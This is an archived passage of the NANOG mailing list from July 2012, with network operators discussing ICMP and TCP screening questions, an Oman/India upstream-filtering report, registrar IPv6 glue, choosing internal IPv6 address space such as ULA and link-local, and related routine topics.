wisdom regarding this cisco thing, but... 
As a botnet operator in the business of making money (and thus relying on the availability of your botnets) why go through the bother of compromising such a system and creating a botnet (which will be rather quickly fixed once the breach is noticed) when you can do it easily enough sending out a simple email with the proper binary code attached, relying on the PEBKAC paradigm. ;-) This method has been proven to be very effective, considering many 100s of millions of zombie computers exist. Greetings, Jeroen -- Earthquake Magnitude: 4.6 Date: Wednesday, July 11, 2012 10:54:36 UTC Location: near the east coast of Honshu, Japan Latitude: 35.9986; Longitude: 140.9388 Depth: 27.40 km From tyler.haske at gmail.com Wed Jul 11 15:21:23 2012 From: tyler.haske at gmail.com (Tyler Haske) Date: Wed, 11 Jul 2012 16:21:23 -0400 Subject: Cisco Update In-Reply-To: <4FFDDC55.3080406@mompl.net> References: <201207071430.q67EUDjx019523@aurora.sol.net> <4FFDDC55.3080406@mompl.net> Message-ID: 1+ billion zombie computers .... source please? > This method has been proven to be very effective, considering many 100s of millions of zombie computers exist. > > Greetings, > Jeroen From nanog at deman.com Wed Jul 11 23:42:01 2012 From: nanog at deman.com (Michael DeMan) Date: Wed, 11 Jul 2012 21:42:01 -0700 Subject: fiber cut in Portland OR / Vancouver WA area Message-ID: We have seen some spottiness with IP and cell phone connectivity in this area. It has been going on for several hours now. Thanks, - mike From nanog at deman.com Thu Jul 12 00:06:40 2012 From: nanog at deman.com (Michael DeMan) Date: Wed, 11 Jul 2012 22:06:40 -0700 Subject: fiber cut in Portland OR / Vancouver WA area In-Reply-To: References: Message-ID: <66211F9E-6A19-4465-B64E-49DAF6A5B935@deman.com> AT&T said they have been doing maintenance, I called in about the cell service issues only. They have an ETA of about 2-3 days for completion of work, which should not drop service but will impact services.
I would guess for 4G upgrades or something and inability/poor-planning on the upgrades. - mike Duh - area is Vancouver WA area On Jul 11, 2012, at 9:42 PM, Michael DeMan wrote: > We have seen some spottiness with IP and cell phone connectivity in this area. It has been going on for several hours now. > > Thanks, > - mike > From daodennis at gmail.com Thu Jul 12 13:19:18 2012 From: daodennis at gmail.com (Dennis) Date: Thu, 12 Jul 2012 11:19:18 -0700 Subject: job screening question In-Reply-To: References: Message-ID: On Thu, Jul 5, 2012 at 10:02 AM, William Herrin wrote: > Hi folks, > > I gave my HR folks a screening question to ask candidates for an IP > expert position. I've gotten some "unexpected" answers, so I want to > do a sanity check and make sure I'm not asking something unreasonable. > And by "unexpected" I don't mean naively incorrect answers, I mean > oh-my-God-how-did-you-get-that-cisco-certification answers. > > The question was: > > You implement a firewall on which you block all ICMP packets. What > part of the TCP protocol (not IP in general, TCP specifically) > malfunctions as a result? > > > My questions for you are: > > 1. As an expert who follows NANOG, do you know the answer? Or is this > question too hard? > I perused the thread but lots of people have mentioned mtu discovery but not what happens on TCP and an issue with mss but not what happens - if there is a smaller mtu along the path the receive window fills up on the host initiating the connection and then the connection just times out. > > 2. Is the question too vague? Is there a clearer way to word it? > It is way too confusing and may be better in a two-part question and work up to it. Instead of asking if all ICMP is blocked put it into Type/Code without giving away that it's the Maybe for HR ask more textbook stuff like name the tcp flags or describe the tcp connection closing or what field determines if a packet can be fragmented and then compare that to how it works in IPv6.
How big are the TCP and IP headers? How many with options? etc... > > 3. Is there a better screening question I could pass to HR to ask and > check the candidate's response against the supplied answer? > > Thanks, > Bill Herrin > > > -- > William D. Herrin ................ herrin at dirtside.com bill at herrin.us > 3005 Crane Dr. ...................... Web: > Falls Church, VA 22042-3004 > > From rguerra at privaterra.org Thu Jul 12 17:21:32 2012 From: rguerra at privaterra.org (Robert Guerra) Date: Thu, 12 Jul 2012 18:21:32 -0400 Subject: Routing Gone Wild: Documenting upstream filtering in Oman via India Message-ID: I know this is outside the NANOG area. Posting here as it might be of interest. Ron and I welcome any comments folks on the list might have on the report. --- New Citizen Lab / ONI cross-posted blog report: Routing Gone Wild: Documenting upstream filtering in Oman via India Key Findings: - Data collected from Oman shows that web filtering applied by India-based ISPs is restricting access to content for customers of an ISP in Oman. While unusual, content filtering undertaken in one political jurisdiction can have an effect on users in another political jurisdiction as a result of ISP routing arrangements, a phenomenon known as "upstream filtering." - Content found to be filtered includes news sites, political blogs and file sharing sites. - Some variability in filtering was documented, potentially linked to certain measures to loosen filtering regulations in India.
https://citizenlab.org/2012/07/routing-gone-wild/ Ronald Deibert Director, the Citizen Lab and the Canada Centre for Global Security Studies Munk School of Global Affairs University of Toronto (416) 946-8916 PGP: http://deibert.citizenlab.org/pubkey.txt http://deibert.citizenlab.org/ twitter.com/citizenlab r.deibert at utoronto.ca From kemp at network-services.uoregon.edu Fri Jul 13 02:35:53 2012 From: kemp at network-services.uoregon.edu (John Kemp) Date: Fri, 13 Jul 2012 00:35:53 -0700 Subject: HELP IN SETTING UP iBGPlay In-Reply-To: References: Message-ID: <4FFFCFD9.9010103@network-services.uoregon.edu> On 7/10/2012 5:04 AM, Joseph M. Owino wrote: > hi, > > Anyone out there who can help in setting up iBGP looking glass for an IXP. We currently are running 2 route servers and 2 switches, they all are Cisco equipment. We also have a working web server running on FreeBSD 8.0. Any help is highly appreciated. > > regards, > Muga > Happy to help you if you get stuck. The work flow looks very similar to what is in BGPlay, so once you have the MRT file that contains desired data, you are most of the way there. I suspect the issue you will hit is that you already have existing route servers, and when you specify the route servers as the source route-reflector-clients, then you will see the route servers as the "routers" in your views rather than your peer routers. If on the other hand you have control over your peer routers, and you can reflect directly to the iBGPlay route server, that appears to be the model they show in their setup documents. John Kemp (kemp at routeviews.org) From brandon at burn.net Fri Jul 13 07:43:03 2012 From: brandon at burn.net (Brandon Applegate) Date: Fri, 13 Jul 2012 08:43:03 -0400 (EDT) Subject: Netsol AAAA glue Message-ID: So I sent an email over a week ago to ipv6req at networksolutions.com - and since I've only received the auto reply.
A year or so ago I did this and got very quick turnaround, but now just dead air (sent another email yesterday). Wanted to see if others had the same results (recently) and any advice before I call into phone tree hell. Thanks. -- Brandon Applegate - CCIE 10273 PGP Key fingerprint: 8779 B023 7637 CEC8 C5C6 4052 664D 7E08 3CBB 1739 "SH1-0151. This is the serial number, of our orbital gun." From jared at puck.nether.net Fri Jul 13 07:52:27 2012 From: jared at puck.nether.net (Jared Mauch) Date: Fri, 13 Jul 2012 08:52:27 -0400 Subject: Netsol AAAA glue In-Reply-To: References: Message-ID: On Jul 13, 2012, at 8:43 AM, Brandon Applegate wrote: > So I sent an email over a week ago to ipv6req at networksolutions.com - and since I've only recieved the auto reply. > > A year or so ago I did this and got very quick turnaround, but now just dead air (sent another email yesterday). > > Wanted to see if others had the same results (recently) and any advice before I call into phone tree hell. Thanks. As long as you're not 1 year into a 10 year renewal, you may want to consider just moving your domains to another registrar such as opensrs. Drawback of using OpenSRS is they don't do DS records for dnssec, if that's a requirement as well, I believe Dyn has a good service for this (or so I read in the OpenSRS forums). - Jared From jeroen at unfix.org Fri Jul 13 07:55:18 2012 From: jeroen at unfix.org (Jeroen Massar) Date: Fri, 13 Jul 2012 14:55:18 +0200 Subject: Netsol AAAA glue In-Reply-To: References: Message-ID: <50001AB6.3040604@unfix.org> On 2012-07-13 14:52 , Jared Mauch wrote: > > On Jul 13, 2012, at 8:43 AM, Brandon Applegate wrote: > >> So I sent an email over a week ago to ipv6req at networksolutions.com >> - and since I've only recieved the auto reply. >> >> A year or so ago I did this and got very quick turnaround, but now >> just dead air (sent another email yesterday). 
>> >> Wanted to see if others had the same results (recently) and any >> advice before I call into phone tree hell. Thanks. > > As long as you're not 1 year into a 10 year renewal, you may want to > consider just moving your domains to another registrar such as > opensrs. Drawback of using OpenSRS is they don't do DS records for > dnssec, if that's a requirement as well, I believe Dyn has a good > service for this (or so I read in the OpenSRS forums). Joker is a good one for that (IPv6 glue + DNSSEC) too, especially because of their automated robot that one can easily push key updates to. Obligatory link containing further options: http://www.sixxs.net/faq/dns/?faq=ipv6glue Greets, Jeroen From cb.list6 at gmail.com Fri Jul 13 08:00:57 2012 From: cb.list6 at gmail.com (Cameron Byrne) Date: Fri, 13 Jul 2012 06:00:57 -0700 Subject: Netsol AAAA glue In-Reply-To: References: Message-ID: On Fri, Jul 13, 2012 at 5:43 AM, Brandon Applegate wrote: > So I sent an email over a week ago to ipv6req at networksolutions.com - and > since I've only recieved the auto reply. > > A year or so ago I did this and got very quick turnaround, but now just dead > air (sent another email yesterday). > > Wanted to see if others had the same results (recently) and any advice > before I call into phone tree hell. Thanks. 
> NetSol has been dragged through the mud on NANOG a few times in recent memory, i believe the best bet is to 1) review the archives 2) find another register from 2008 http://www.nanog.org/mailinglist/mailarchives/old_archive/2008-07/msg00542.html from a few months ago http://seclists.org/nanog/2012/Mar/1001 CB From asullivan at dyn.com Fri Jul 13 08:07:17 2012 From: asullivan at dyn.com (Andrew Sullivan) Date: Fri, 13 Jul 2012 09:07:17 -0400 Subject: Netsol AAAA glue In-Reply-To: References: Message-ID: <20120713130717.GB93613@dyn.com> On Fri, Jul 13, 2012 at 08:52:27AM -0400, Jared Mauch wrote: > dnssec, if that's a requirement as well, I believe Dyn has a good > service for this (or so I read in the OpenSRS forums). Yes, Dyn supports DNSSEC and will send the DS to the registrar and so on. We'll also host the DNS using DNSSEC for you, but it's not a requirement to use our service for this. (I'm delighted to hear that people say it's good.) Best, A -- Andrew Sullivan Dyn Labs asullivan at dyn.com From jacques at siberia.co.za Fri Jul 13 08:13:51 2012 From: jacques at siberia.co.za (Jacques Marneweck) Date: Fri, 13 Jul 2012 15:13:51 +0200 Subject: Netsol AAAA glue In-Reply-To: References: Message-ID: <50001F0F.8010005@siberia.co.za> Hi Brandon, Check out Name Cheap. One has to submit a support ticket for them to contact enom to add the ipv6 bits but that takes less than 2 days to have in place. Regards --jm > Brandon Applegate > 13 July 2012 2:43 PM > So I sent an email over a week ago to ipv6req at networksolutions.com - > and since I've only recieved the auto reply. > > A year or so ago I did this and got very quick turnaround, but now > just dead air (sent another email yesterday). > > Wanted to see if others had the same results (recently) and any advice > before I call into phone tree hell. Thanks. > > -- > Brandon Applegate - CCIE 10273 > PGP Key fingerprint: > 8779 B023 7637 CEC8 C5C6 4052 664D 7E08 3CBB 1739 > "SH1-0151. 
This is the serial number, of our orbital gun." > > From eugen at leitl.org Fri Jul 13 08:54:15 2012 From: eugen at leitl.org (Eugen Leitl) Date: Fri, 13 Jul 2012 15:54:15 +0200 Subject: [liberationtech] new opennet citizen lab report: routing gone wild Message-ID: <20120713135415.GP12615@leitl.org> ----- Forwarded message from Ronald Deibert ----- From: Ronald Deibert Date: Fri, 13 Jul 2012 09:45:29 -0400 To: Liberation Tech List Subject: [liberationtech] new opennet citizen lab report: routing gone wild X-Mailer: Apple Mail (2.1278) Routing Gone Wild: Documenting upstream filtering in Oman via India Key Findings: - Data collected from Oman shows that web filtering applied by India-based ISPs is restricting access to content for customers of an ISP in Oman. While unusual, content filtering undertaken in one political jurisdiction can have an effect on users in another political jurisdiction as a result of ISP routing arrangements, a phenomenon known as "upstream filtering." - Content found to be filtered includes news sites, political blogs and file sharing sites. - Some variability in filtering was documented, potentially linked to certain measures to loosen filtering regulations in India. http://arstechnica.com/tech-policy/2012/07/internet-content-blocking-travels-downstream-affects-unwary-users/ https://citizenlab.org/2012/07/routing-gone-wild/ https://citizenlab.org/wp-content/uploads/2012/07/08-2012-routinggonewild.pdf http://opennet.net/blog/2012/07/routing-gone-wild-documenting-upstream-filtering-oman-india Please Note: Data Raw data for the proxy test results cited here can be found in the following formats: Summarized results [Google doc] Summarized results [csv] Raw data [zip - html, csv, txt] The data presented is from a June 18, 2012 test run of a URL list through two Omantel proxies, as well as from the Czech Republic as a control.
There are three types of block pages that have been highlighted in the columns: oman_block_social - An Omani block page that specifies that the blocking was due to "societal and cultural norms of the sultanate." oman_block_laws - An Omani block page that specifies the reason for blocking was a violation of the law. india_block - An Indian block page that specifies the reason for blocking was a court order. The presented zip file contains the html contents and headers returned during the course of this test run. To view this data, extract the zip file and open the contained index.html. Please exercise caution when following any links in this file, as the file contains contents of website data returned and we can make no guarantee as to what these sites contain. This data is presented for informational purposes only and we make no claims regarding the ownership of website content. There were two redactions made in the data. The IP numbers of proxies used were obfuscated and the website contents of the site songdad.com were removed, due to the fact that during the time of testing this site contained the JS/Blacole exploit kit. Ronald J. Deibert Professor of Political Science Director, The Canada Centre for Global Security Studies and The Citizen Lab Munk School of Global Affairs University of Toronto r.deibert at utoronto.ca http://deibert.citizenlab.org/ twitter.com/citizenlab _______________________________________________ liberationtech mailing list liberationtech at lists.stanford.edu Should you need to change your subscription options, please go to: https://mailman.stanford.edu/mailman/listinfo/liberationtech If you would like to receive a daily digest, click "yes" (once you click above) next to "would you like to receive list mail batched in a daily digest?" You will need the user name and password you receive from the list moderator in monthly reminders. 
You may ask for a reminder here: https://mailman.stanford.edu/mailman/listinfo/liberationtech Should you need immediate assistance, please contact the list moderator. Please don't forget to follow us on http://twitter.com/#!/Liberationtech ----- End forwarded message ----- -- Eugen* Leitl leitl http://leitl.org ______________________________________________________________ ICBM: 48.07100, 11.36820 http://www.ativel.com http://postbiota.org 8B29F6BE: 099D 78BA 2FD3 B014 B08A 7779 75B0 2443 8B29 F6BE From bhmccie at gmail.com Fri Jul 13 09:38:28 2012 From: bhmccie at gmail.com (-Hammer-) Date: Fri, 13 Jul 2012 09:38:28 -0500 Subject: using "reserved" IPv6 space Message-ID: <500032E4.40804@gmail.com> OK. I'm pretty sure I'm gonna get some flak for this but I'll share this question and its background anyway. Please be gentle. In the past, with IPv4, we have used reserved or "non-routable" space internally in production for segments that won't be seen anywhere else. Examples? A sync VLAN for some FWs to share state. An IBGP link between routers that will never be seen or advertised. In those cases, we have often used 192.0.2.0/24. It's reserved and never used and even if it did get used one day we aren't "routing" it internally. It's just on segments where we need some L3 that will never be seen. On to IPv6: I was considering taking the same approach. Maybe using 0100::/8 or 1000::/4 or A000::/3 as a space for this. Other than the usual "Hey, you shouldn't do that" can anyone give me some IPv6 specific reasons that I may not be forecasting that would make it worse doing this than in an IPv4 scenario? I know, not apples to apples but for this question they are close enough. Unless there is something IPv6 specific that is influencing this....
-- -Hammer- "I was a normal American nerd" -Jack Herer From jeroen at unfix.org Fri Jul 13 09:41:41 2012 From: jeroen at unfix.org (Jeroen Massar) Date: Fri, 13 Jul 2012 16:41:41 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <500032E4.40804@gmail.com> References: <500032E4.40804@gmail.com> Message-ID: <500033A5.4090707@unfix.org> On 2012-07-13 16:38, -Hammer- wrote: > OK. I'm pretty sure I'm gonna get some flak for this but I'll share this > question and it's background anyway. Please be gentle. > > In the past, with IPv4, we have used reserved or "non-routable" space > Internally in production for segments that won't be seen anywhere else. There is this very nice concept called ULA (RFC4193), use it. If you want to be more sure about uniqueness, use http://www.sixxs.net/tools/grh/ula/ or you can also just use a chunk of your 'global' prefix and don't announce a route for it and firewall it off properly. Greets, Jeroen From leo.vegoda at icann.org Fri Jul 13 09:41:37 2012 From: leo.vegoda at icann.org (Leo Vegoda) Date: Fri, 13 Jul 2012 07:41:37 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <500032E4.40804@gmail.com> References: <500032E4.40804@gmail.com> Message-ID: <41F6C547EA49EC46B4EE1EB2BC2F34185DA598DD28@EXVPMBX100-1.exc.icann.org> Hammer wrote: > In the past, with IPv4, we have used reserved or "non-routable" space > Internally in production for segments that won't be seen anywhere else. > Examples? A sync VLAN for some FWs to share state. An IBGP link between > routers that will never be seen or advertised. In those cases, we have > often used 192.0.2.0/24. It's reserved and never used and even if it did > get used one day we aren't "routing" it internally. It's just on > segments where we need some L3 that will never be seen. > > On to IPv6 > > I was considering taking the same approach. Maybe using 0100::/8 or > 1000::/4 or A000::/3 as a space for this. Why can't you just generate a ULA and use that? 
Regards, Leo From bhmccie at gmail.com Fri Jul 13 09:43:42 2012 From: bhmccie at gmail.com (-Hammer-) Date: Fri, 13 Jul 2012 09:43:42 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <500033A5.4090707@unfix.org> References: <500032E4.40804@gmail.com> <500033A5.4090707@unfix.org> Message-ID: <5000341E.9010703@gmail.com> Leo/Jeroen, Thank you both. That is the simple answer that I wasn't thinking of. I'm not as IPv6 savvy as I need to be (yet) so I haven't put all the pieces together when trying to look at the bigger picture. Thanks again. -Hammer- "I was a normal American nerd" -Jack Herer On 7/13/2012 9:41 AM, Jeroen Massar wrote: > On 2012-07-13 16:38, -Hammer- wrote: >> OK. I'm pretty sure I'm gonna get some flak for this but I'll share this >> question and it's background anyway. Please be gentle. >> >> In the past, with IPv4, we have used reserved or "non-routable" space >> Internally in production for segments that won't be seen anywhere else. > There is this very nice concept called ULA (RFC4193), use it. > If you want to be more sure about uniqueness, use > http://www.sixxs.net/tools/grh/ula/ > or you can also just use a chunk of your 'global' prefix and don't > announce a route for it and firewall it off properly. > > Greets, > Jeroen > From trejrco at gmail.com Fri Jul 13 10:05:40 2012 From: trejrco at gmail.com (TJ) Date: Fri, 13 Jul 2012 11:05:40 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <500032E4.40804@gmail.com> References: <500032E4.40804@gmail.com> Message-ID: On Fri, Jul 13, 2012 at 10:38 AM, -Hammer- wrote: > OK. I'm pretty sure I'm gonna get some flak for this but I'll share this > question and it's background anyway. Please be gentle.
> > In the past, with IPv4, we have used reserved or "non-routable" space > Internally in production for segments that won't be seen anywhere else. > Examples? A sync VLAN for some FWs to share state. An IBGP link between > routers that will never be seen or advertised. In those cases, we have > often used 192.0.2.0/24. It's reserved and never used and even if it did > get used one day we aren't "routing" it internally. It's just on segments > where we need some L3 that will never be seen. > > On to IPv6 > > I was considering taking the same approach. Maybe using 0100::/8 or > 1000::/4 or A000::/3 as a space for this. > Would using "just" Link Locals not be sufficient? *(Failing that, as others noted, ULAs are the next "right" answer ... )* * * /TJ From bhmccie at gmail.com Fri Jul 13 10:45:57 2012 From: bhmccie at gmail.com (-Hammer-) Date: Fri, 13 Jul 2012 10:45:57 -0500 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> Message-ID: <500042B5.4030502@gmail.com> I think they would. I'm just a bit too new to this. Thanks. -Hammer- "I was a normal American nerd" -Jack Herer On 7/13/2012 10:05 AM, TJ wrote: > On Fri, Jul 13, 2012 at 10:38 AM, -Hammer- > wrote: > > OK. I'm pretty sure I'm gonna get some flak for this but I'll > share this question and it's background anyway. Please be gentle. > > In the past, with IPv4, we have used reserved or "non-routable" > space Internally in production for segments that won't be seen > anywhere else. Examples? A sync VLAN for some FWs to share state. > An IBGP link between routers that will never be seen or > advertised. In those cases, we have often used 192.0.2.0/24 > . It's reserved and never used and even if it > did get used one day we aren't "routing" it internally. It's just > on segments where we need some L3 that will never be seen. > > On to IPv6 > > I was considering taking the same approach. Maybe using 0100::/8 > or 1000::/4 or A000::/3 as a space for this. 
> > > > Would using "just" Link Locals not be sufficient? > /(Failing that, as others noted, ULAs are the next "right" answer ... )/ > / > / > /TJ From thomascooperca at gmail.com Fri Jul 13 11:11:26 2012 From: thomascooperca at gmail.com (Tom Cooper) Date: Fri, 13 Jul 2012 12:11:26 -0400 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> Message-ID: On Fri, Jul 13, 2012 at 11:05 AM, TJ wrote: > On Fri, Jul 13, 2012 at 10:38 AM, -Hammer- wrote: > > > OK. I'm pretty sure I'm gonna get some flak for this but I'll share this > > question and it's background anyway. Please be gentle. > > > > In the past, with IPv4, we have used reserved or "non-routable" space > > Internally in production for segments that won't be seen anywhere else. > > Examples? A sync VLAN for some FWs to share state. An IBGP link between > > routers that will never be seen or advertised. In those cases, we have > > often used 192.0.2.0/24. It's reserved and never used and even if it did > > get used one day we aren't "routing" it internally. It's just on segments > > where we need some L3 that will never be seen. > > > > On to IPv6 > > > > I was considering taking the same approach. Maybe using 0100::/8 or > > 1000::/4 or A000::/3 as a space for this. > > > > > Would using "just" Link Locals not be sufficient? > *(Failing that, as others noted, ULAs are the next "right" answer ... )* > * > * > /TJ > As an IPv6 newbie myself, I wonder how hosts handle link local, ULA and global addresses. For example, if you have some internal web traffic used for intranet use only, do you bind those servers to use only ULA addresses? This way your internal users with ULA addressing only have access to those servers? No need to give intranet-only servers a global address if they're not needed to be accessed globally. 
Is there a way for hosts to "prefer" or "attempt" to connect to a service by first trying a link-local scope, then a ULA and finally a global address if it's off the AS? I really like the idea of ULA and think it makes much more sense than RFC1918 + NAT. I just don't have any deployment experience with it yet so I'm curious how the host would handle it. On the router side, I'm sure ULA and global routing just run as ships-in-the-night side-by-side anyways...right? -- Thomas Cooper From aid at logic.org.uk Fri Jul 13 11:17:29 2012 From: aid at logic.org.uk (Adrian Bool) Date: Fri, 13 Jul 2012 17:17:29 +0100 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> Message-ID: On 13 Jul 2012, at 17:11, Tom Cooper wrote: > On Fri, Jul 13, 2012 at 11:05 AM, TJ wrote: > > As an IPv6 newbie myself, I wonder how hosts handle link local, ULA and > global addresses. > For example, if you have some internal web traffic used for intranet use > only, do you bind those servers to use only ULA addresses? This way your > internal users with ULA addressing only have access to those servers? No > need to give intranet-only servers a global address if they're not needed > to be accessed globally. > > Is there a way for hosts to "prefer" or "attempt" to connect to a service > by first trying a link-local scope, then a ULA and finally a global address > if it's off the AS? There is an RFC that describes how hosts should select addresses in such situations, http://tools.ietf.org/html/rfc3484 As an aside, it would be great if some more IPv6 questions could be put on http://ipv6exchange.net/ - I would love to see that become a useful resource for people starting out with IPv6. If you have an IPv6 question, please do post!
Cheers, aid From bhmccie at gmail.com Fri Jul 13 11:21:13 2012 From: bhmccie at gmail.com (-Hammer-) Date: Fri, 13 Jul 2012 11:21:13 -0500 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> Message-ID: <50004AF9.9010601@gmail.com> I'm having similar thoughts and we are about to implement. Fortunately we are implementing in an isolated lab first for this exact reason. For us to figure things out first before attempting them elsewhere. I like the ULA approach. I'm not sure about link local being used as strategy for Internal services. I'm finally getting to the point where I'm looking past the vastness of the numbers and just focusing on subnets and masks and subnetting and whatnot. -Hammer- "I was a normal American nerd" -Jack Herer On 7/13/2012 11:11 AM, Tom Cooper wrote: > On Fri, Jul 13, 2012 at 11:05 AM, TJ > wrote: > > On Fri, Jul 13, 2012 at 10:38 AM, -Hammer- > wrote: > > > OK. I'm pretty sure I'm gonna get some flak for this but I'll > share this > > question and it's background anyway. Please be gentle. > > > > In the past, with IPv4, we have used reserved or "non-routable" > space > > Internally in production for segments that won't be seen > anywhere else. > > Examples? A sync VLAN for some FWs to share state. An IBGP link > between > > routers that will never be seen or advertised. In those cases, > we have > > often used 192.0.2.0/24 . It's reserved and > never used and even if it did > > get used one day we aren't "routing" it internally. It's just on > segments > > where we need some L3 that will never be seen. > > > > On to IPv6 > > > > I was considering taking the same approach. Maybe using 0100::/8 or > > 1000::/4 or A000::/3 as a space for this. > > > > > Would using "just" Link Locals not be sufficient? > *(Failing that, as others noted, ULAs are the next "right" answer > ... )* > * > * > /TJ > > > As an IPv6 newbie myself, I wonder how hosts handle link local, ULA > and global addresses. 
> For example, if you have some internal web traffic used for intranet > use only, do you bind those servers to use only ULA addresses? This > way your internal users with ULA addressing only have access to those > servers? No need to give intranet-only servers a global address if > they're not needed to be accessed globally. > > Is there a way for hosts to "prefer" or "attempt" to connect to a > service by first trying a link-local scope, then a ULA and finally a > global address if it's off the AS? > I really like the idea of ULA and think it makes much more sense than > RFC1918 + NAT. I just don't have any deployment experience with it yet > so I'm curious how the host would handle it. > > On the router side, I'm sure ULA and global routing just run as > ships-in-the-night side-by-side anyways...right? > > -- > Thomas Cooper From trejrco at gmail.com Fri Jul 13 11:34:15 2012 From: trejrco at gmail.com (TJ) Date: Fri, 13 Jul 2012 12:34:15 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <50004AF9.9010601@gmail.com> References: <500032E4.40804@gmail.com> <50004AF9.9010601@gmail.com> Message-ID: Note that I meant using Link Locals for directly connected devices *(neighbors; e.g. - routing protocol neighborship formation)*. If they are not on-link with each other, Link Locals are a non-starter ... ULAs would be a possible solution for a completely disconnected network. Note that many are proponents of using Globals even in those situations, with judicious filtering stopping any inbound/outbound traffic. The benefit being that "it's never going to be connected" doesn't really always mean "it's never going to be connected" :). *YMMV, as always!* /TJ On Fri, Jul 13, 2012 at 12:21 PM, -Hammer- wrote: > I'm having similar thoughts and we are about to implement. Fortunately we > are implementing in an isolated lab first for this exact reason. For us to > figure things out first before attempting them elsewhere. > > I like the ULA approach.
I'm not sure about link local being used as > strategy for Internal services. I'm finally getting to the point where I'm > looking past the vastness of the numbers and just focusing on subnets and > masks and subnetting and whatnot. > > -Hammer- > > "I was a normal American nerd" > -Jack Herer > > > > On 7/13/2012 11:11 AM, Tom Cooper wrote: > > On Fri, Jul 13, 2012 at 11:05 AM, TJ wrote: > >> On Fri, Jul 13, 2012 at 10:38 AM, -Hammer- wrote: >> >> > OK. I'm pretty sure I'm gonna get some flak for this but I'll share this >> > question and it's background anyway. Please be gentle. >> > >> > In the past, with IPv4, we have used reserved or "non-routable" space >> > Internally in production for segments that won't be seen anywhere else. >> > Examples? A sync VLAN for some FWs to share state. An IBGP link between >> > routers that will never be seen or advertised. In those cases, we have >> > often used 192.0.2.0/24. It's reserved and never used and even if it >> did >> > get used one day we aren't "routing" it internally. It's just on >> segments >> > where we need some L3 that will never be seen. >> > >> > On to IPv6 >> > >> > I was considering taking the same approach. Maybe using 0100::/8 or >> > 1000::/4 or A000::/3 as a space for this. >> > >> >> >> Would using "just" Link Locals not be sufficient? >> *(Failing that, as others noted, ULAs are the next "right" answer ... )* >> * >> * >> /TJ >> > > As an IPv6 newbie myself, I wonder how hosts handle link local, ULA and > global addresses. > For example, if you have some internal web traffic used for intranet use > only, do you bind those servers to use only ULA addresses? This way your > internal users with ULA addressing only have access to those servers? No > need to give intranet-only servers a global address if they're not needed > to be accessed globally. 
> > Is there a way for hosts to "prefer" or "attempt" to connect to a service > by first trying a link-local scope, then a ULA and finally a global address > if its off the AS? > I really like the idea of ULA and think it makes much more sense than > RFC1918 + NAT. I just don't have any deployment experience with it yet so > I'm curious how the host would handle it. > > On the router side, I'm sure ULA and global routing just run as > ships-in-the-night side-by-side anyways...right? > > -- > Thomas Cooper > > From skeeve at eintellego.net Fri Jul 13 11:37:49 2012 From: skeeve at eintellego.net (Skeeve Stevens) Date: Sat, 14 Jul 2012 02:37:49 +1000 Subject: using "reserved" IPv6 space In-Reply-To: <500032E4.40804@gmail.com> References: <500032E4.40804@gmail.com> Message-ID: See RFC 3849 - http://tools.ietf.org/html/rfc3849 Which pre-scribed the range: 2001:DB8::/32 for use in Documentation. I suppose this could be used for lab testing. *ducks flames* * * *Skeeve Stevens, CEO - *eintellego Pty Ltd skeeve at eintellego.net ; www.eintellego.net Phone: 1300 753 383; Cell +61 (0)414 753 383 ; skype://skeeve facebook.com/eintellego ; linkedin.com/in/skeeve twitter.com/networkceoau ; blog: www.network-ceo.net The Experts Who The Experts Call Juniper - Cisco ? IBM On Sat, Jul 14, 2012 at 12:38 AM, -Hammer- wrote: > OK. I'm pretty sure I'm gonna get some flak for this but I'll share this > question and it's background anyway. Please be gentle. > > In the past, with IPv4, we have used reserved or "non-routable" space > Internally in production for segments that won't be seen anywhere else. > Examples? A sync VLAN for some FWs to share state. An IBGP link between > routers that will never be seen or advertised. In those cases, we have > often used 192.0.2.0/24. It's reserved and never used and even if it did > get used one day we aren't "routing" it internally. It's just on segments > where we need some L3 that will never be seen. 
> > On to IPv6 > > I was considering taking the same approach. Maybe using 0100::/8 or > 1000::/4 or A000::/3 as a space for this. > > Other than the usual "Hey, you shouldn't do that" can anyone give me some > IPv6 specific reasons that I may not be forecasting that would make it > worse doing this than in an IPv4 scenario. I know, not apples to apples but > for this question they are close enough. Unless there is something IPv6 > specific that is influencing this.... > > -- > > > -Hammer- > > "I was a normal American nerd" > -Jack Herer > > > > From jbates at brightok.net Fri Jul 13 11:46:04 2012 From: jbates at brightok.net (Jack Bates) Date: Fri, 13 Jul 2012 11:46:04 -0500 Subject: Our first inbound email via IPv6 (was spam!) In-Reply-To: References: Message-ID: <500050CC.8080400@brightok.net> On 6/5/2012 9:29 AM, Raymond Dijkxhoorn wrote: > > Looking more closely... Is this still work in progress? > > ;; ANSWER SECTION: > comcast.net. 358 IN MX 5 mx3.comcast.net. > comcast.net. 358 IN MX 10 mx1.comcast.net. > comcast.net. 358 IN MX 5 mx2.comcast.net. > > ;; ADDITIONAL SECTION: > mx2.comcast.net. 6958 IN A 76.96.30.116 > mx3.comcast.net. 358 IN A 68.87.26.147 > mx1.comcast.net. 358 IN AAAA 2001:558:fe14:70::22 > > You are now only accepting IPv6 if all IPv4 fails? > Or will AAAA records for mx2 and mx3 added later? > Actually, I've had a problem with my version of sendmail on solaris choosing mx1.comcast.net and then reporting host not found. I think this is an issue with address selection, despite the server not being setup for v6 (os/sendmail are set for v6 support, but no assignment). I can't think of another reason why it would bounce 800+ emails with relay=mx1.comcast.net but have 0 logs for mx2/mx3. 
